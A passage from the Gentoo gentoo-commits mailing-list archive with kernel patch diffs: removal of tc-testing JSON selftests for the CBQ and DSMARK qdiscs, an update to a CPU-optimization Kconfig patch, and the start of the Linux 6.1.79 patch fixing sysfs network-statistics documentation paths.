+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "4684",
+-        "name": "Create CBQ with valid cell num",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 cell 128",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "4345",
+-        "name": "Create CBQ with invalid cell num",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 cell 100",
+-        "expExitCode": "1",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "4525",
+-        "name": "Create CBQ with valid ewma",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 ewma 16",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "6784",
+-        "name": "Create CBQ with invalid ewma",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000 ewma 128",
+-        "expExitCode": "1",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "5468",
+-        "name": "Delete CBQ with handle",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true",
+-            "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000"
+-        ],
+-        "cmdUnderTest": "$TC qdisc del dev $DUMMY handle 1: root",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc cbq 1: root refcnt [0-9]+ rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "492a",
+-        "name": "Show CBQ class",
+-        "category": [
+-            "qdisc",
+-            "cbq"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root cbq bandwidth 10000 avpkt 9000",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC class show dev $DUMMY",
+-        "matchPattern": "class cbq 1: root rate 10Kbit \\(bounded,isolated\\) prio no-transmit",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    }
+-]
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/dsmark.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/dsmark.json
+deleted file mode 100644
+index c030795f9c37d..0000000000000
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/dsmark.json
++++ /dev/null
+@@ -1,140 +0,0 @@
+-[
+-    {
+-        "id": "6345",
+-        "name": "Create DSMARK with default setting",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "3462",
+-        "name": "Create DSMARK with default_index setting",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024 default_index 512",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400 default_index 0x0200",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "ca95",
+-        "name": "Create DSMARK with set_tc_index flag",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024 set_tc_index",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400 set_tc_index",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "a950",
+-        "name": "Create DSMARK with multiple setting",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024 default_index 1024 set_tc_index",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400 default_index 0x0400 set_tc_index",
+-        "matchCount": "1",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "4092",
+-        "name": "Delete DSMARK with handle",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true",
+-            "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024 default_index 1024"
+-        ],
+-        "cmdUnderTest": "$TC qdisc del dev $DUMMY handle 1: root",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc dsmark 1: root refcnt [0-9]+ indices 0x0400",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    },
+-    {
+-        "id": "5930",
+-        "name": "Show DSMARK class",
+-        "category": [
+-            "qdisc",
+-            "dsmark"
+-        ],
+-        "plugins": {
+-            "requires": "nsPlugin"
+-        },
+-        "setup": [
+-            "$IP link add dev $DUMMY type dummy || /bin/true"
+-        ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root dsmark indices 1024",
+-        "expExitCode": "0",
+-        "verifyCmd": "$TC class show dev $DUMMY",
+-        "matchPattern": "class dsmark 1:",
+-        "matchCount": "0",
+-        "teardown": [
+-            "$TC qdisc del dev $DUMMY handle 1: root",
+-            "$IP link del dev $DUMMY type dummy"
+-        ]
+-    }
+-]


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-23 13:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-02-23 13:19 UTC (permalink / raw
  To: gentoo-commits

commit:     ff81d2160a223fce45984c504cd886e7fdde438a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Feb 23 13:19:36 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Feb 23 13:19:36 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ff81d216

Update cpu opt patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5010_enable-cpu-optimizations-universal.patch | 71 ++++++++++++++-------------
 1 file changed, 36 insertions(+), 35 deletions(-)

diff --git a/5010_enable-cpu-optimizations-universal.patch b/5010_enable-cpu-optimizations-universal.patch
index 7a1b717a..596cade6 100644
--- a/5010_enable-cpu-optimizations-universal.patch
+++ b/5010_enable-cpu-optimizations-universal.patch
@@ -1,6 +1,6 @@
-From 70d4906b87983ed2ed5da78930a701625d881dd0 Mon Sep 17 00:00:00 2001
+From 71dd30c3e2ab2852b0290ae1f34ce1c7f8655040 Mon Sep 17 00:00:00 2001
 From: graysky <therealgraysky@proton.me>
-Date: Thu, 5 Jan 2023 14:29:37 -0500
+Date: Wed, 21 Feb 2024 08:38:13 -0500
 
 FEATURES
 This patch adds additional CPU options to the Linux kernel accessible under:
@@ -13,9 +13,10 @@ offered which are good for supported Intel or AMD CPUs:
 • x86-64-v3
 • x86-64-v4
 
-Users of glibc 2.33 and above can see which level is supported by current
-hardware by running:
+Users of glibc 2.33 and above can see which level is supported by running:
   /lib/ld-linux-x86-64.so.2 --help | grep supported
+Or
+  /lib64/ld-linux-x86-64.so.2 --help | grep supported
 
 Alternatively, compare the flags from /proc/cpuinfo to this list.[1]
 
@@ -106,12 +107,12 @@ REFERENCES
  3 files changed, 528 insertions(+), 17 deletions(-)
 
 diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
-index 542377cd419d..f589971df2d3 100644
+index 87396575c..5ac6e8463 100644
 --- a/arch/x86/Kconfig.cpu
 +++ b/arch/x86/Kconfig.cpu
 @@ -157,7 +157,7 @@ config MPENTIUM4
- 
- 
+
+
  config MK6
 -	bool "K6/K6-II/K6-III"
 +	bool "AMD K6/K6-II/K6-III"
@@ -120,7 +121,7 @@ index 542377cd419d..f589971df2d3 100644
  	  Select this for an AMD K6-family processor.  Enables use of
 @@ -165,7 +165,7 @@ config MK6
  	  flags to GCC.
- 
+
  config MK7
 -	bool "Athlon/Duron/K7"
 +	bool "AMD Athlon/Duron/K7"
@@ -129,7 +130,7 @@ index 542377cd419d..f589971df2d3 100644
  	  Select this for an AMD Athlon K7-family processor.  Enables use of
 @@ -173,12 +173,106 @@ config MK7
  	  flags to GCC.
- 
+
  config MK8
 -	bool "Opteron/Athlon64/Hammer/K8"
 +	bool "AMD Opteron/Athlon64/Hammer/K8"
@@ -137,7 +138,7 @@ index 542377cd419d..f589971df2d3 100644
  	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
  	  Enables use of some extended instructions, and passes appropriate
  	  optimization flags to GCC.
- 
+
 +config MK8SSE3
 +	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
 +	help
@@ -237,17 +238,17 @@ index 542377cd419d..f589971df2d3 100644
  	depends on X86_32
 @@ -270,7 +364,7 @@ config MPSC
  	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
- 
+
  config MCORE2
 -	bool "Core 2/newer Xeon"
 +	bool "Intel Core 2"
  	help
- 
+
  	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
 @@ -278,6 +372,8 @@ config MCORE2
  	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
  	  (not a typo)
- 
+
 +	  Enables -march=core2
 +
  config MATOM
@@ -256,7 +257,7 @@ index 542377cd419d..f589971df2d3 100644
 @@ -287,6 +383,212 @@ config MATOM
  	  accordingly optimized code. Use a recent GCC with specific Atom
  	  support in order to fully benefit from selecting this option.
- 
+
 +config MNEHALEM
 +	bool "Intel Nehalem"
 +	select X86_P6_NOP
@@ -469,7 +470,7 @@ index 542377cd419d..f589971df2d3 100644
 @@ -294,6 +596,50 @@ config GENERIC_CPU
  	  Generic x86-64 CPU.
  	  Run equally well on all x86-64 CPUs.
- 
+
 +config GENERIC_CPU2
 +	bool "Generic-x86-64-v2"
 +	depends on (CC_IS_GCC && GCC_VERSION > 110000) || (CC_IS_CLANG && CLANG_VERSION >= 120000)
@@ -515,7 +516,7 @@ index 542377cd419d..f589971df2d3 100644
 +	  Enables -march=native
 +
  endchoice
- 
+
  config X86_GENERIC
 @@ -318,9 +664,17 @@ config X86_INTERNODE_CACHE_SHIFT
  config X86_L1_CACHE_SHIFT
@@ -534,17 +535,17 @@ index 542377cd419d..f589971df2d3 100644
 -	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
 +	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII \
 +	|| MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
- 
+
  config X86_F00F_BUG
  	def_bool y
 @@ -332,15 +686,27 @@ config X86_INVD_BUG
- 
+
  config X86_ALIGNMENT_16
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC || M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
 +	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC \
 +	|| M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
- 
+
  config X86_INTEL_USERCOPY
  	def_bool y
 -	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
@@ -553,7 +554,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
 +	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL
- 
+
  config X86_USE_PPRO_CHECKSUM
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
@@ -565,7 +566,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE \
 +	|| MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
 +	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
- 
+
  #
  # P6_NOPs are a relatively minor optimization that require a family >=
 @@ -356,32 +722,63 @@ config X86_USE_PPRO_CHECKSUM
@@ -578,7 +579,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE \
 +	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
 +	|| MNATIVE_INTEL)
- 
+
  config X86_TSC
  	def_bool y
 -	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
@@ -590,7 +591,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
 +	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS \
 +	|| MNATIVE_INTEL || MNATIVE_AMD) || X86_64
- 
+
  config X86_CMPXCHG64
  	def_bool y
 -	depends on X86_PAE || X86_64 || MCORE2 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586TSC || M586MMX || MATOM || MGEODE_LX || MGEODEGX1 || MK6 || MK7 || MK8
@@ -601,7 +602,7 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE \
 +	|| MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
 +	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD
- 
+
  # this should be set for all -march=.. options where the compiler
  # generates cmov.
  config X86_CMOV
@@ -614,13 +615,13 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
 +	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
 +	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MEMERALDRAPIDS || MNATIVE_INTEL || MNATIVE_AMD)
- 
+
  config X86_MINIMUM_CPU_FAMILY
  	int
  	default "64" if X86_64
--	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8)
+-	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCORE2 || MK7 || MK8)
 +	default "6" if X86_32 && (MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 \
-+	|| MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCRUSOE || MCORE2 || MK7 || MK8 ||  MK8SSE3 \
++	|| MVIAC3_2 || MVIAC7 || MEFFICEON || MATOM || MCORE2 || MK7 || MK8 ||  MK8SSE3 \
 +	|| MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER \
 +	|| MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT \
 +	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
@@ -629,20 +630,20 @@ index 542377cd419d..f589971df2d3 100644
 +	|| MNATIVE_INTEL || MNATIVE_AMD)
  	default "5" if X86_32 && X86_CMPXCHG64
  	default "4"
- 
+
  config X86_DEBUGCTLMSR
  	def_bool y
 -	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 || M486SX || M486) && !UML
 +	depends on !(MK6 || MWINCHIPC6 || MWINCHIP3D || MCYRIXIII || M586MMX || M586TSC || M586 \
 +	|| M486SX || M486) && !UML
- 
+
  config IA32_FEAT_CTL
  	def_bool y
 diff --git a/arch/x86/Makefile b/arch/x86/Makefile
-index 415a5d138de4..17b1e039d955 100644
+index 1a068de12..23b2ec69d 100644
 --- a/arch/x86/Makefile
 +++ b/arch/x86/Makefile
-@@ -151,8 +151,48 @@ else
+@@ -152,8 +152,48 @@ else
          # FIXME - should be integrated in Makefile.cpu (Makefile_32.cpu)
          cflags-$(CONFIG_MK8)		+= -march=k8
          cflags-$(CONFIG_MPSC)		+= -march=nocona
@@ -692,9 +693,9 @@ index 415a5d138de4..17b1e039d955 100644
 +        cflags-$(CONFIG_GENERIC_CPU4) 	+= -march=x86-64-v4
          cflags-$(CONFIG_GENERIC_CPU)	+= -mtune=generic
          KBUILD_CFLAGS += $(cflags-y)
- 
+
 diff --git a/arch/x86/include/asm/vermagic.h b/arch/x86/include/asm/vermagic.h
-index 75884d2cdec3..02c1386eb653 100644
+index 75884d2cd..02c1386eb 100644
 --- a/arch/x86/include/asm/vermagic.h
 +++ b/arch/x86/include/asm/vermagic.h
 @@ -17,6 +17,54 @@
@@ -785,5 +786,5 @@ index 75884d2cdec3..02c1386eb653 100644
  #elif defined CONFIG_MELAN
  #define MODULE_PROC_FAMILY "ELAN "
  #elif defined CONFIG_MCRUSOE
--- 
-2.39.0
+--
+2.43.0.232.ge79552d197


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-23 12:37 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-02-23 12:37 UTC (permalink / raw
  To: gentoo-commits

commit:     c01acf6f609ce49d27c723598d558377d83d6681
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Feb 23 12:37:18 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Feb 23 12:37:18 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c01acf6f

Linux patch 6.1.79

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1078_linux-6.1.79.patch | 9468 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9472 insertions(+)

diff --git a/0000_README b/0000_README
index 7d732a84..4d09930e 100644
--- a/0000_README
+++ b/0000_README
@@ -355,6 +355,10 @@ Patch:  1077_linux-6.1.78.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.78
 
+Patch:  1078_linux-6.1.79.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.79
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1078_linux-6.1.79.patch b/1078_linux-6.1.79.patch
new file mode 100644
index 00000000..1136d033
--- /dev/null
+++ b/1078_linux-6.1.79.patch
@@ -0,0 +1,9468 @@
+diff --git a/Documentation/ABI/testing/sysfs-class-net-statistics b/Documentation/ABI/testing/sysfs-class-net-statistics
+index 55db27815361b..53e508c6936a5 100644
+--- a/Documentation/ABI/testing/sysfs-class-net-statistics
++++ b/Documentation/ABI/testing/sysfs-class-net-statistics
+@@ -1,4 +1,4 @@
+-What:		/sys/class/<iface>/statistics/collisions
++What:		/sys/class/net/<iface>/statistics/collisions
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -6,7 +6,7 @@ Description:
+ 		Indicates the number of collisions seen by this network device.
+ 		This value might not be relevant with all MAC layers.
+ 
+-What:		/sys/class/<iface>/statistics/multicast
++What:		/sys/class/net/<iface>/statistics/multicast
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -14,7 +14,7 @@ Description:
+ 		Indicates the number of multicast packets received by this
+ 		network device.
+ 
+-What:		/sys/class/<iface>/statistics/rx_bytes
++What:		/sys/class/net/<iface>/statistics/rx_bytes
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -23,7 +23,7 @@ Description:
+ 		See the network driver for the exact meaning of when this
+ 		value is incremented.
+ 
+-What:		/sys/class/<iface>/statistics/rx_compressed
++What:		/sys/class/net/<iface>/statistics/rx_compressed
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -32,7 +32,7 @@ Description:
+ 		network device. This value might only be relevant for interfaces
+ 		that support packet compression (e.g: PPP).
+ 
+-What:		/sys/class/<iface>/statistics/rx_crc_errors
++What:		/sys/class/net/<iface>/statistics/rx_crc_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -41,7 +41,7 @@ Description:
+ 		by this network device. Note that the specific meaning might
+ 		depend on the MAC layer used by the interface.
+ 
+-What:		/sys/class/<iface>/statistics/rx_dropped
++What:		/sys/class/net/<iface>/statistics/rx_dropped
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -51,7 +51,7 @@ Description:
+ 		packet processing. See the network driver for the exact
+ 		meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_errors
++What:		/sys/class/net/<iface>/statistics/rx_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -59,7 +59,7 @@ Description:
+ 		Indicates the number of receive errors on this network device.
+ 		See the network driver for the exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_fifo_errors
++What:		/sys/class/net/<iface>/statistics/rx_fifo_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -68,7 +68,7 @@ Description:
+ 		network device. See the network driver for the exact
+ 		meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_frame_errors
++What:		/sys/class/net/<iface>/statistics/rx_frame_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -78,7 +78,7 @@ Description:
+ 		on the MAC layer protocol used. See the network driver for
+ 		the exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_length_errors
++What:		/sys/class/net/<iface>/statistics/rx_length_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -87,7 +87,7 @@ Description:
+ 		error, oversized or undersized. See the network driver for the
+ 		exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_missed_errors
++What:		/sys/class/net/<iface>/statistics/rx_missed_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -96,7 +96,7 @@ Description:
+ 		due to lack of capacity in the receive side. See the network
+ 		driver for the exact meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_nohandler
++What:		/sys/class/net/<iface>/statistics/rx_nohandler
+ Date:		February 2016
+ KernelVersion:	4.6
+ Contact:	netdev@vger.kernel.org
+@@ -104,7 +104,7 @@ Description:
+ 		Indicates the number of received packets that were dropped on
+ 		an inactive device by the network core.
+ 
+-What:		/sys/class/<iface>/statistics/rx_over_errors
++What:		/sys/class/net/<iface>/statistics/rx_over_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -114,7 +114,7 @@ Description:
+ 		(e.g: larger than MTU). See the network driver for the exact
+ 		meaning of this value.
+ 
+-What:		/sys/class/<iface>/statistics/rx_packets
++What:		/sys/class/net/<iface>/statistics/rx_packets
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -122,7 +122,7 @@ Description:
+ 		Indicates the total number of good packets received by this
+ 		network device.
+ 
+-What:		/sys/class/<iface>/statistics/tx_aborted_errors
++What:		/sys/class/net/<iface>/statistics/tx_aborted_errors
+ Date:		April 2005
+ KernelVersion:	2.6.12
+ Contact:	netdev@vger.kernel.org
+@@ -132,7 +132,7 @@ Description:
+ 		a medium collision). See the network driver for the exact
